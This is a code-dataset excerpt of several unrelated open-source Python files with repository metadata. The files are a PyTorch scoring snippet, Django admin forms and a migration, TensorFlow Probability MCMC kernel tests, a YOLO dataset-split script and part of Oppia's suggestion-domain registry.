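bsz, n_codes, num_cands, dim = 2, 4, 3, 8
ctxt_rep = torch.randn(bsz, n_codes, dim)       # e.g. the learned codes after attention
cand_embed = torch.randn(bsz, num_cands, dim)   # candidate encodings
attn = torch.softmax(torch.bmm(cand_embed, ctxt_rep.transpose(1, 2)), dim=-1)  # bsz x num_cands x n_codes
ctxt_final_rep = torch.bmm(attn, ctxt_rep)      # bsz x num_cands x dim
scores = (ctxt_final_rep * cand_embed).sum(dim=2)
print(scores.shape)  # torch.Size([2, 3]) == bsz x num_cands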
| 37.680203
| 111
| 0.586915
|
794fe58c0313ee36dd73a228e17c9ec7c2ecf884
| 2,244
|
py
|
Python
|
accounts/admin.py
|
mtuktarov/mtuktarov.com
|
82a3b70da1f81e49f5df0d4c98fd213372c3a7bc
|
[
"MIT"
] | null | null | null |
accounts/admin.py
|
mtuktarov/mtuktarov.com
|
82a3b70da1f81e49f5df0d4c98fd213372c3a7bc
|
[
"MIT"
] | null | null | null |
accounts/admin.py
|
mtuktarov/mtuktarov.com
|
82a3b70da1f81e49f5df0d4c98fd213372c3a7bc
|
[
"MIT"
] | null | null | null |
from django import forms
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth.forms import UserCreationForm, UserChangeForm
from django.contrib.auth.forms import ReadOnlyPasswordHashField
# Register your models here.
from .models import BlogUser
from django.utils.translation import gettext, gettext_lazy as _
from django.contrib.auth.forms import UsernameField
class BlogUserCreationForm(forms.ModelForm):
    password1 = forms.CharField(label='Enter password', widget=forms.PasswordInput)
    password2 = forms.CharField(label='Enter it again!', widget=forms.PasswordInput)
class Meta:
model = BlogUser
fields = ('email',)
def clean_password2(self):
# Check that the two password entries match
password1 = self.cleaned_data.get("password1")
password2 = self.cleaned_data.get("password2")
if password1 and password2 and password1 != password2:
            raise forms.ValidationError("Passwords do not match")
return password2
def save(self, commit=True):
# Save the provided password in hashed format
user = super().save(commit=False)
user.set_password(self.cleaned_data["password1"])
if commit:
user.source = 'adminsite'
user.save()
return user
class BlogUserChangeForm(UserChangeForm):
password = ReadOnlyPasswordHashField(
label=_("Password"),
        help_text=_(
            "We do not store passwords in plain text, so we have no idea what "
            "you came up with there! We do applaud the imagination, though. You "
            "can make up a new one <a href=\"{}\">by following this link</a>."
        ),
)
email = forms.EmailField(label="Email", widget=forms.EmailInput)
class Meta:
model = BlogUser
fields = '__all__'
field_classes = {'username': UsernameField}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class BlogUserAdmin(UserAdmin):
form = BlogUserChangeForm
add_form = BlogUserCreationForm
list_display = ('id', 'nickname', 'username', 'email', 'last_login', 'date_joined', 'source')
list_display_links = ('id', 'username')
ordering = ('-id',)
| 35.0625
| 97
| 0.680036
|
794fe5b636d673855828a5eec038bb101309e95d
| 11,213
|
py
|
Python
|
tensorflow_probability/python/mcmc/transformed_kernel_test.py
|
nxdao2000/probability
|
33d2bc1cb0e7b6284579ea7f3692b9d056e0d700
|
[
"Apache-2.0"
] | 1
|
2020-07-12T22:40:42.000Z
|
2020-07-12T22:40:42.000Z
|
tensorflow_probability/python/mcmc/transformed_kernel_test.py
|
nxdao2000/probability
|
33d2bc1cb0e7b6284579ea7f3692b9d056e0d700
|
[
"Apache-2.0"
] | 2
|
2019-08-01T18:31:41.000Z
|
2019-08-01T19:42:15.000Z
|
tensorflow_probability/python/mcmc/transformed_kernel_test.py
|
nxdao2000/probability
|
33d2bc1cb0e7b6284579ea7f3692b9d056e0d700
|
[
"Apache-2.0"
] | 1
|
2020-04-17T18:01:47.000Z
|
2020-04-17T18:01:47.000Z
|
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for `TransformedTransitionKernel` `TransitionKernel`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
# Dependency imports
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import
tfd = tfp.distributions
tfb = tfp.bijectors
FakeInnerKernelResults = collections.namedtuple(
'FakeInnerKernelResults', ['target_log_prob'])
def _maybe_seed(seed):
if tf.executing_eagerly():
tf.compat.v1.set_random_seed(seed)
return None
return seed
class FakeInnerKernel(tfp.mcmc.TransitionKernel):
"""Fake Transition Kernel."""
def __init__(self, target_log_prob_fn):
self._parameters = dict(target_log_prob_fn=target_log_prob_fn)
@property
def parameters(self):
return self._parameters
@property
def is_calibrated(self):
return True
def one_step(self, current_state, previous_kernel_results):
pass
def bootstrap_results(self, init_state):
return FakeInnerKernelResults(
target_log_prob=self._parameters['target_log_prob_fn'](init_state))
@test_util.run_all_in_graph_and_eager_modes
class TransformedTransitionKernelTest(tf.test.TestCase):
def setUp(self):
super(TransformedTransitionKernelTest, self).setUp()
self.dtype = np.float32
def test_support_works_correctly_with_HMC(self):
num_results = 2000
target = tfd.Beta(
concentration1=self.dtype(1.),
concentration0=self.dtype(10.))
transformed_hmc = tfp.mcmc.TransformedTransitionKernel(
inner_kernel=tfp.mcmc.HamiltonianMonteCarlo(
target_log_prob_fn=tf.function(target.log_prob, autograph=False),
step_size=1.64,
num_leapfrog_steps=2,
seed=_maybe_seed(55)),
bijector=tfb.Sigmoid())
# Recall, tfp.mcmc.sample_chain calls
# transformed_hmc.bootstrap_results too.
states, kernel_results = tfp.mcmc.sample_chain(
num_results=num_results,
# The initial state is used by inner_kernel.bootstrap_results.
# Note the input is *after* bijector.forward.
current_state=self.dtype(0.25),
kernel=transformed_hmc,
num_burnin_steps=200,
num_steps_between_results=1,
parallel_iterations=1)
self.assertEqual(num_results, tf.compat.dimension_value(states.shape[0]))
sample_mean = tf.reduce_mean(input_tensor=states, axis=0)
sample_var = tf.reduce_mean(
input_tensor=tf.math.squared_difference(states, sample_mean), axis=0)
[
sample_mean_,
sample_var_,
is_accepted_,
true_mean_,
true_var_,
] = self.evaluate([
sample_mean,
sample_var,
kernel_results.inner_results.is_accepted,
target.mean(),
target.variance(),
])
self.assertAllClose(true_mean_, sample_mean_,
atol=0.06, rtol=0.)
self.assertAllClose(true_var_, sample_var_,
atol=0.01, rtol=0.1)
self.assertNear(0.6, is_accepted_.mean(), err=0.05)
def test_support_works_correctly_with_MALA(self):
num_results = 2000
target = tfd.Beta(
concentration1=self.dtype(1.),
concentration0=self.dtype(10.))
transformed_mala = tfp.mcmc.TransformedTransitionKernel(
inner_kernel=tfp.mcmc.MetropolisAdjustedLangevinAlgorithm(
target_log_prob_fn=tf.function(target.log_prob, autograph=False),
step_size=1.,
seed=_maybe_seed(55)),
bijector=tfb.Sigmoid())
    # Recall, tfp.mcmc.sample_chain calls
    # transformed_mala.bootstrap_results too.
states, _ = tfp.mcmc.sample_chain(
num_results=num_results,
# The initial state is used by inner_kernel.bootstrap_results.
# Note the input is *after* bijector.forward.
current_state=self.dtype(0.25),
kernel=transformed_mala,
num_burnin_steps=200,
num_steps_between_results=1,
parallel_iterations=1)
self.assertEqual(num_results, tf.compat.dimension_value(states.shape[0]))
sample_mean = tf.reduce_mean(input_tensor=states, axis=0)
sample_var = tf.reduce_mean(
input_tensor=tf.math.squared_difference(states, sample_mean), axis=0)
[
sample_mean_,
sample_var_,
true_mean_,
true_var_,
] = self.evaluate([
sample_mean,
sample_var,
target.mean(),
target.variance(),
])
self.assertAllClose(true_mean_, sample_mean_,
atol=0.06, rtol=0.)
self.assertAllClose(true_var_, sample_var_,
atol=0.01, rtol=0.1)
def test_support_works_correctly_with_RWM(self):
num_results = 2000
target = tfd.Beta(
concentration1=self.dtype(1.),
concentration0=self.dtype(10.))
transformed_rwm = tfp.mcmc.TransformedTransitionKernel(
inner_kernel=tfp.mcmc.RandomWalkMetropolis(
target_log_prob_fn=tf.function(target.log_prob, autograph=False),
new_state_fn=tfp.mcmc.random_walk_normal_fn(scale=1.5),
seed=_maybe_seed(55)),
bijector=tfb.Sigmoid())
    # Recall, tfp.mcmc.sample_chain calls
    # transformed_rwm.bootstrap_results too.
states, _ = tfp.mcmc.sample_chain(
num_results=num_results,
# The initial state is used by inner_kernel.bootstrap_results.
# Note the input is *after* bijector.forward.
current_state=self.dtype(0.25),
kernel=transformed_rwm,
num_burnin_steps=200,
num_steps_between_results=1,
parallel_iterations=1)
self.assertEqual(num_results, tf.compat.dimension_value(states.shape[0]))
sample_mean = tf.reduce_mean(input_tensor=states, axis=0)
sample_var = tf.reduce_mean(
input_tensor=tf.math.squared_difference(states, sample_mean), axis=0)
[
sample_mean_,
sample_var_,
true_mean_,
true_var_,
] = self.evaluate([
sample_mean,
sample_var,
target.mean(),
target.variance(),
])
self.assertAllClose(true_mean_, sample_mean_,
atol=0.06, rtol=0.)
self.assertAllClose(true_var_, sample_var_,
atol=0.01, rtol=0.1)
def test_end_to_end_works_correctly(self):
true_mean = self.dtype([0, 0])
true_cov = self.dtype([[1, 0.5],
[0.5, 1]])
num_results = 2000
def target_log_prob(x, y):
# Corresponds to unnormalized MVN.
# z = matmul(inv(chol(true_cov)), [x, y] - true_mean)
z = tf.stack([x, y], axis=-1) - true_mean
z = tf.squeeze(
tf.linalg.triangular_solve(
np.linalg.cholesky(true_cov),
z[..., tf.newaxis]),
axis=-1)
return -0.5 * tf.reduce_sum(input_tensor=z**2., axis=-1)
transformed_hmc = tfp.mcmc.TransformedTransitionKernel(
inner_kernel=tfp.mcmc.HamiltonianMonteCarlo(
target_log_prob_fn=tf.function(target_log_prob, autograph=False),
# Affine scaling means we have to change the step_size
# in order to get 60% acceptance, as was done in mcmc/hmc_test.py.
step_size=[1.23 / 0.75, 1.23 / 0.5],
num_leapfrog_steps=2,
seed=_maybe_seed(54)),
bijector=[
tfb.AffineScalar(scale=0.75),
tfb.AffineScalar(scale=0.5),
])
# Recall, tfp.mcmc.sample_chain calls
# transformed_hmc.bootstrap_results too.
states, kernel_results = tfp.mcmc.sample_chain(
num_results=num_results,
# The initial state is used by inner_kernel.bootstrap_results.
# Note the input is *after* `bijector.forward`.
current_state=[self.dtype(-2), self.dtype(2)],
kernel=transformed_hmc,
num_burnin_steps=200,
num_steps_between_results=1,
parallel_iterations=1)
states = tf.stack(states, axis=-1)
self.assertEqual(num_results, tf.compat.dimension_value(states.shape[0]))
sample_mean = tf.reduce_mean(input_tensor=states, axis=0)
x = states - sample_mean
sample_cov = tf.matmul(x, x, transpose_a=True) / self.dtype(num_results)
[sample_mean_, sample_cov_, is_accepted_] = self.evaluate([
sample_mean, sample_cov, kernel_results.inner_results.is_accepted])
self.assertNear(0.6, is_accepted_.mean(), err=0.05)
self.assertAllClose(true_mean, sample_mean_,
atol=0.06, rtol=0.)
self.assertAllClose(true_cov, sample_cov_,
atol=0., rtol=0.1)
def test_bootstrap_requires_xor_args(self):
def fake_target_log_prob(x):
return -x**2 / 2.
transformed_fake = tfp.mcmc.TransformedTransitionKernel(
inner_kernel=FakeInnerKernel(target_log_prob_fn=fake_target_log_prob),
bijector=tfb.Exp())
with self.assertRaisesWithPredicateMatch(
ValueError, r'Must specify exactly one'):
transformed_fake.bootstrap_results()
with self.assertRaisesWithPredicateMatch(
ValueError, r'Must specify exactly one'):
transformed_fake.bootstrap_results(
init_state=2., transformed_init_state=np.log(2.))
def test_bootstrap_correctly_untransforms(self):
def fake_target_log_prob(x):
return -x**2 / 2.
transformed_fake = tfp.mcmc.TransformedTransitionKernel(
inner_kernel=FakeInnerKernel(target_log_prob_fn=fake_target_log_prob),
bijector=tfb.Exp())
automatic_pkr, manual_pkr = self.evaluate([
transformed_fake.bootstrap_results(2.),
transformed_fake.bootstrap_results(transformed_init_state=[4., 5.]),
])
self.assertNear(np.log(2.), automatic_pkr.transformed_state, err=1e-6)
self.assertAllClose(
[4., 5.], manual_pkr.transformed_state, atol=0., rtol=1e-6)
def test_copy_works(self):
def fake_target_log_prob(x):
return -x**2 / 2.
transformed = tfp.mcmc.TransformedTransitionKernel(
inner_kernel=FakeInnerKernel(target_log_prob_fn=fake_target_log_prob),
bijector=tfb.AffineScalar(2.))
transformed_copy = tfp.mcmc.TransformedTransitionKernel(
**transformed.parameters)
pkr, pkr_copy = self.evaluate([
transformed.bootstrap_results(1.),
transformed_copy.bootstrap_results(1.)
])
self.assertAllClose(pkr.inner_results.target_log_prob,
pkr_copy.inner_results.target_log_prob)
if __name__ == '__main__':
tf.test.main()
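# --- Editor's note: hedged sketch, not part of the original test file. ---
# The tests above let the inner kernels (HMC/MALA/RWM) propose in unconstrained
# space and map the state through tfb.Sigmoid so it always lands in the (0, 1)
# support of the Beta target. The tiny numpy snippet below only illustrates
# that mapping; it is not TFP code.
import numpy as np
def _sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))
unconstrained = np.array([-5.0, -1.0, 0.0, 1.0, 5.0])  # where the inner kernel works
print(_sigmoid(unconstrained))  # every value falls strictly inside (0, 1)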
| 36.288026
| 95
| 0.675198
|
794fe73d96b0a0802c06268dd28084b7e47c45cb
| 881
|
py
|
Python
|
scripts/make_Txt.py
|
COEN-390/YOLOv5-Lite
|
06a53f5d001c5d37729f55f47cbd46cc8eb63f84
|
[
"MIT"
] | null | null | null |
scripts/make_Txt.py
|
COEN-390/YOLOv5-Lite
|
06a53f5d001c5d37729f55f47cbd46cc8eb63f84
|
[
"MIT"
] | null | null | null |
scripts/make_Txt.py
|
COEN-390/YOLOv5-Lite
|
06a53f5d001c5d37729f55f47cbd46cc8eb63f84
|
[
"MIT"
] | 1
|
2021-09-03T01:16:31.000Z
|
2021-09-03T01:16:31.000Z
|
import os
import random
trainval_percent = 0.1
train_percent = 0.9
xmlfilepath = 'data/Person1K/Annotations'
txtsavepath = 'data/Person1K/ImageSets'
total_xml = os.listdir(xmlfilepath)
num = len(total_xml)
indices = range(num)  # avoid shadowing the built-in `list`
tv = int(num * trainval_percent)
tr = int(tv * train_percent)
trainval = random.sample(indices, tv)
train = random.sample(trainval, tr)
# use forward slashes so the paths also work outside Windows
ftrainval = open('data/Person1K/ImageSets/trainval.txt', 'w')
ftest = open('data/Person1K/ImageSets/test.txt', 'w')
ftrain = open('data/Person1K/ImageSets/train.txt', 'w')
fval = open('data/Person1K/ImageSets/val.txt', 'w')
for i in indices:
name = total_xml[i][:-4] + '\n'
if i in trainval:
ftrainval.write(name)
if i in train:
ftest.write(name)
else:
fval.write(name)
else:
ftrain.write(name)
ftrainval.close()
ftrain.close()
fval.close()
ftest.close()
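# --- Editor's note: hedged worked example, not part of the original script. ---
# With the percentages above and a hypothetical 1000 annotation files:
#   tv = int(1000 * 0.1) = 100 names sampled into `trainval`
#   tr = int(100 * 0.9)  =  90 of those sampled again into `train`
# so the branches above write 900 names to train.txt, 90 to test.txt and
# 10 to val.txt.
num_example = 1000
tv_example = int(num_example * 0.1)
tr_example = int(tv_example * 0.9)
print(num_example - tv_example, tr_example, tv_example - tr_example)  # 900 90 10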
| 24.472222
| 61
| 0.673099
|
794fe88f64243e31adb84e0f4495980c23c96f9d
| 1,927
|
py
|
Python
|
backend/api/migrations/0010_advertsettings_mimeuser_timeline.py
|
Kovszasz/MYG
|
fc932bef8b67d568ac60bba5604009550570fca9
|
[
"MIT"
] | null | null | null |
backend/api/migrations/0010_advertsettings_mimeuser_timeline.py
|
Kovszasz/MYG
|
fc932bef8b67d568ac60bba5604009550570fca9
|
[
"MIT"
] | 7
|
2020-06-06T00:58:09.000Z
|
2022-02-26T20:03:02.000Z
|
backend/api/migrations/0010_advertsettings_mimeuser_timeline.py
|
Kovszasz/MYG
|
fc932bef8b67d568ac60bba5604009550570fca9
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2.6 on 2019-10-16 18:54
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('auth', '0011_update_proxy_permissions'),
('api', '0009_mods'),
]
operations = [
migrations.CreateModel(
name='AdvertSettings',
fields=[
('admin', models.ForeignKey(default='', on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to=settings.AUTH_USER_MODEL)),
('AdFrequency', models.IntegerField(default=50)),
('MoneyForSeen', models.FloatField(default=0)),
('MoneyForClick', models.FloatField(default=0)),
],
),
migrations.CreateModel(
name='TimeLine',
fields=[
('date', models.DateField(auto_now_add=True)),
('content_post', models.ForeignKey(blank=True, default='', on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to='api.Post')),
('post_from_last_advert', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='MimeUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('profile_pic', models.ImageField(blank=True, upload_to='profile')),
('IsAdvertiser', models.BooleanField(default=False)),
('company', models.CharField(default='', max_length=100)),
('balance', models.FloatField(default=0)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| 41.891304
| 171
| 0.60301
|
794fe8a5884c417938fb16e54f045b0d3636db61
| 41,494
|
py
|
Python
|
core/domain/suggestion_registry.py
|
shavavo/oppia
|
db78ca81804c3d05334d74efd2c5e55f86ef8545
|
[
"Apache-2.0"
] | null | null | null |
core/domain/suggestion_registry.py
|
shavavo/oppia
|
db78ca81804c3d05334d74efd2c5e55f86ef8545
|
[
"Apache-2.0"
] | 1
|
2020-03-02T21:05:42.000Z
|
2020-03-03T07:09:51.000Z
|
core/domain/suggestion_registry.py
|
shavavo/oppia
|
db78ca81804c3d05334d74efd2c5e55f86ef8545
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Registry for Oppia suggestions. Contains a BaseSuggestion class and
subclasses for each type of suggestion.
"""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
from constants import constants
from core.domain import exp_domain
from core.domain import exp_fetchers
from core.domain import exp_services
from core.domain import fs_services
from core.domain import html_cleaner
from core.domain import question_domain
from core.domain import question_services
from core.domain import skill_domain
from core.domain import skill_fetchers
from core.domain import state_domain
from core.domain import user_services
from core.platform import models
import feconf
import python_utils
import utils
(suggestion_models,) = models.Registry.import_models([models.NAMES.suggestion])
class BaseSuggestion(python_utils.OBJECT):
"""Base class for a suggestion.
Attributes:
suggestion_id: str. The ID of the suggestion.
suggestion_type: str. The type of the suggestion.
target_type: str. The type of target entity being edited.
target_id: str. The ID of the target entity being edited.
target_version_at_submission: int. The version number of the target
entity at the time of creation of the suggestion.
status: str. The status of the suggestion.
author_id: str. The ID of the user who submitted the suggestion.
final_reviewer_id: str. The ID of the reviewer who has accepted/rejected
the suggestion.
change: Change. The details of the suggestion. This should be an
object of type ExplorationChange, TopicChange, etc.
score_category: str. The scoring category for the suggestion.
last_updated: datetime.datetime. Date and time when the suggestion
was last updated.
"""
def __init__(self, status, final_reviewer_id):
"""Initializes a Suggestion object."""
self.status = status
self.final_reviewer_id = final_reviewer_id
def to_dict(self):
"""Returns a dict representation of a suggestion object.
Returns:
dict. A dict representation of a suggestion object.
"""
return {
'suggestion_id': self.suggestion_id,
'suggestion_type': self.suggestion_type,
'target_type': self.target_type,
'target_id': self.target_id,
'target_version_at_submission': self.target_version_at_submission,
'status': self.status,
'author_name': self.get_author_name(),
'final_reviewer_id': self.final_reviewer_id,
'change': self.change.to_dict(),
'score_category': self.score_category,
'last_updated': utils.get_time_in_millisecs(self.last_updated)
}
def get_score_type(self):
"""Returns the first part of the score category. The first part refers
        to the type of scoring. The value of this part will be among
suggestion_models.SCORE_TYPE_CHOICES.
Returns:
str. The first part of the score category.
"""
return self.score_category.split(
suggestion_models.SCORE_CATEGORY_DELIMITER)[0]
def get_author_name(self):
"""Returns the author's username.
Returns:
str. The username of the author of the suggestion.
"""
return user_services.get_username(self.author_id)
def get_score_sub_type(self):
"""Returns the second part of the score category. The second part refers
to the specific area where the author needs to be scored. This can be
the category of the exploration, the language of the suggestion, or the
skill linked to the question.
Returns:
str. The second part of the score category.
"""
return self.score_category.split(
suggestion_models.SCORE_CATEGORY_DELIMITER)[1]
def set_suggestion_status_to_accepted(self):
"""Sets the status of the suggestion to accepted."""
self.status = suggestion_models.STATUS_ACCEPTED
def set_suggestion_status_to_in_review(self):
"""Sets the status of the suggestion to in review."""
self.status = suggestion_models.STATUS_IN_REVIEW
def set_suggestion_status_to_rejected(self):
"""Sets the status of the suggestion to rejected."""
self.status = suggestion_models.STATUS_REJECTED
def set_final_reviewer_id(self, reviewer_id):
"""Sets the final reviewer id of the suggestion to be reviewer_id.
Args:
reviewer_id: str. The ID of the user who completed the review.
"""
self.final_reviewer_id = reviewer_id
def validate(self):
"""Validates the BaseSuggestion object. Each subclass must implement
this function.
The subclasses must validate the change and score_category fields.
Raises:
ValidationError. One or more attributes of the BaseSuggestion object
are invalid.
"""
if (
self.suggestion_type not in
suggestion_models.SUGGESTION_TYPE_CHOICES):
raise utils.ValidationError(
'Expected suggestion_type to be among allowed choices, '
'received %s' % self.suggestion_type)
if self.target_type not in suggestion_models.TARGET_TYPE_CHOICES:
raise utils.ValidationError(
'Expected target_type to be among allowed choices, '
'received %s' % self.target_type)
if not isinstance(self.target_id, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected target_id to be a string, received %s' % type(
self.target_id))
if not isinstance(self.target_version_at_submission, int):
raise utils.ValidationError(
'Expected target_version_at_submission to be an int, '
'received %s' % type(self.target_version_at_submission))
if self.status not in suggestion_models.STATUS_CHOICES:
raise utils.ValidationError(
'Expected status to be among allowed choices, '
'received %s' % self.status)
if not isinstance(self.author_id, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected author_id to be a string, received %s' % type(
self.author_id))
if (
self.author_id is not None and
not user_services.is_user_id_correct(self.author_id)
):
raise utils.ValidationError(
'Expected author_id to be in a valid user ID format, '
'received %s' % self.author_id)
if self.final_reviewer_id is not None:
if not isinstance(self.final_reviewer_id, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected final_reviewer_id to be a string, received %s' %
type(self.final_reviewer_id))
if (
not user_services.is_user_id_correct(
self.final_reviewer_id) and
self.final_reviewer_id != feconf.SUGGESTION_BOT_USER_ID
):
raise utils.ValidationError(
'Expected final_reviewer_id to be in a valid user ID '
'format, received %s' % self.final_reviewer_id)
if not isinstance(self.score_category, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected score_category to be a string, received %s' % type(
self.score_category))
if (
suggestion_models.SCORE_CATEGORY_DELIMITER not in
self.score_category):
raise utils.ValidationError(
'Expected score_category to be of the form'
' score_type%sscore_sub_type, received %s' % (
suggestion_models.SCORE_CATEGORY_DELIMITER,
self.score_category))
if (
len(self.score_category.split(
suggestion_models.SCORE_CATEGORY_DELIMITER))) != 2:
raise utils.ValidationError(
'Expected score_category to be of the form'
' score_type%sscore_sub_type, received %s' % (
suggestion_models.SCORE_CATEGORY_DELIMITER,
self.score_category))
if self.get_score_type() not in suggestion_models.SCORE_TYPE_CHOICES:
raise utils.ValidationError(
'Expected the first part of score_category to be among allowed'
' choices, received %s' % self.get_score_type())
def accept(self):
"""Accepts the suggestion. Each subclass must implement this
function.
"""
raise NotImplementedError(
'Subclasses of BaseSuggestion should implement accept.')
def get_change_list_for_accepting_suggestion(self):
"""Before accepting the suggestion, a change_list needs to be generated
from the change. Each subclass must implement this function.
"""
raise NotImplementedError(
'Subclasses of BaseSuggestion should implement '
'get_change_list_for_accepting_suggestion.')
def pre_accept_validate(self):
"""Performs referential validation. This function needs to be called
before accepting the suggestion.
"""
raise NotImplementedError(
'Subclasses of BaseSuggestion should implement '
'pre_accept_validate.')
def populate_old_value_of_change(self):
"""Populates the old_value field of the change."""
raise NotImplementedError(
'Subclasses of BaseSuggestion should implement '
'populate_old_value_of_change.')
def pre_update_validate(self, change):
"""Performs the pre update validation. This function needs to be called
before updating the suggestion.
"""
raise NotImplementedError(
'Subclasses of BaseSuggestion should implement '
'pre_update_validate.')
def get_all_html_content_strings(self):
"""Gets all html content strings used in this suggestion."""
raise NotImplementedError(
'Subclasses of BaseSuggestion should implement '
'get_all_html_content_strings.')
def convert_html_in_suggestion_change(self, conversion_fn):
"""Checks for HTML fields in a suggestion change and converts it
according to the conversion function.
"""
raise NotImplementedError(
'Subclasses of BaseSuggestion should implement '
'convert_html_in_suggestion_change.')
@property
def is_handled(self):
"""Returns if the suggestion has either been accepted or rejected.
Returns:
bool. Whether the suggestion has been handled or not.
"""
return self.status != suggestion_models.STATUS_IN_REVIEW
class SuggestionEditStateContent(BaseSuggestion):
"""Domain object for a suggestion of type
SUGGESTION_TYPE_EDIT_STATE_CONTENT.
"""
def __init__(
self, suggestion_id, target_id, target_version_at_submission,
status, author_id, final_reviewer_id,
change, score_category, last_updated=None):
"""Initializes an object of type SuggestionEditStateContent
corresponding to the SUGGESTION_TYPE_EDIT_STATE_CONTENT choice.
"""
super(SuggestionEditStateContent, self).__init__(
status, final_reviewer_id)
self.suggestion_id = suggestion_id
self.suggestion_type = (
suggestion_models.SUGGESTION_TYPE_EDIT_STATE_CONTENT)
self.target_type = suggestion_models.TARGET_TYPE_EXPLORATION
self.target_id = target_id
self.target_version_at_submission = target_version_at_submission
self.author_id = author_id
self.change = exp_domain.ExplorationChange(change)
self.score_category = score_category
self.last_updated = last_updated
def validate(self):
"""Validates a suggestion object of type SuggestionEditStateContent.
Raises:
ValidationError. One or more attributes of the
SuggestionEditStateContent object are invalid.
"""
super(SuggestionEditStateContent, self).validate()
if not isinstance(self.change, exp_domain.ExplorationChange):
raise utils.ValidationError(
'Expected change to be an ExplorationChange, received %s'
% type(self.change))
if self.get_score_type() != suggestion_models.SCORE_TYPE_CONTENT:
raise utils.ValidationError(
'Expected the first part of score_category to be %s '
', received %s' % (
suggestion_models.SCORE_TYPE_CONTENT,
self.get_score_type()))
if self.change.cmd != exp_domain.CMD_EDIT_STATE_PROPERTY:
raise utils.ValidationError(
'Expected cmd to be %s, received %s' % (
exp_domain.CMD_EDIT_STATE_PROPERTY, self.change.cmd))
if (self.change.property_name !=
exp_domain.STATE_PROPERTY_CONTENT):
raise utils.ValidationError(
'Expected property_name to be %s, received %s' % (
exp_domain.STATE_PROPERTY_CONTENT,
self.change.property_name))
def pre_accept_validate(self):
"""Performs referential validation. This function needs to be called
before accepting the suggestion.
"""
self.validate()
states = exp_fetchers.get_exploration_by_id(self.target_id).states
if self.change.state_name not in states:
raise utils.ValidationError(
'Expected %s to be a valid state name' %
self.change.state_name)
def get_change_list_for_accepting_suggestion(self):
"""Gets a complete change for the suggestion.
Returns:
list(ExplorationChange). The change_list corresponding to the
suggestion.
"""
change = self.change
exploration = exp_fetchers.get_exploration_by_id(self.target_id)
old_content = (
exploration.states[self.change.state_name].content.to_dict())
change.old_value = old_content
change.new_value['content_id'] = old_content['content_id']
return [change]
def populate_old_value_of_change(self):
"""Populates old value of the change."""
exploration = exp_fetchers.get_exploration_by_id(self.target_id)
if self.change.state_name not in exploration.states:
# As the state doesn't exist now, we cannot find the content of the
# state to populate the old_value field. So we set it as None.
old_content = None
else:
old_content = (
exploration.states[self.change.state_name].content.to_dict())
self.change.old_value = old_content
def accept(self, commit_message):
"""Accepts the suggestion.
Args:
commit_message: str. The commit message.
"""
change_list = self.get_change_list_for_accepting_suggestion()
exp_services.update_exploration(
self.final_reviewer_id, self.target_id, change_list,
commit_message, is_suggestion=True)
def pre_update_validate(self, change):
"""Performs the pre update validation. This function needs to be called
before updating the suggestion.
Args:
change: ExplorationChange. The new change.
Raises:
ValidationError. Invalid new change.
"""
if self.change.cmd != change.cmd:
raise utils.ValidationError(
'The new change cmd must be equal to %s' %
self.change.cmd)
elif self.change.property_name != change.property_name:
raise utils.ValidationError(
'The new change property_name must be equal to %s' %
self.change.property_name)
elif self.change.state_name != change.state_name:
raise utils.ValidationError(
'The new change state_name must be equal to %s' %
self.change.state_name)
elif self.change.new_value['html'] == change.new_value['html']:
raise utils.ValidationError(
'The new html must not match the old html')
def get_all_html_content_strings(self):
"""Gets all html content strings used in this suggestion.
Returns:
list(str). The list of html content strings.
"""
html_string_list = [self.change.new_value['html']]
if self.change.old_value is not None:
html_string_list.append(self.change.old_value['html'])
return html_string_list
def convert_html_in_suggestion_change(self, conversion_fn):
"""Checks for HTML fields in a suggestion change and converts it
according to the conversion function.
Args:
conversion_fn: function. The function to be used for converting the
HTML.
"""
if self.change.old_value is not None:
self.change.old_value['html'] = (
conversion_fn(self.change.old_value['html']))
self.change.new_value['html'] = (
conversion_fn(self.change.new_value['html']))
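# Illustrative sketch (hypothetical, not part of the original module): the
# typical lifecycle of an edit-state-content suggestion object once it has
# been reconstituted from a storage model. The method names are the ones
# defined above; the commit message string is made up.
#
#   suggestion.pre_accept_validate()
#   suggestion.populate_old_value_of_change()
#   suggestion.accept('Accepting suggested content edit.')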
class SuggestionTranslateContent(BaseSuggestion):
"""Domain object for a suggestion of type
SUGGESTION_TYPE_TRANSLATE_CONTENT.
"""
def __init__(
self, suggestion_id, target_id, target_version_at_submission,
status, author_id, final_reviewer_id,
change, score_category, last_updated=None):
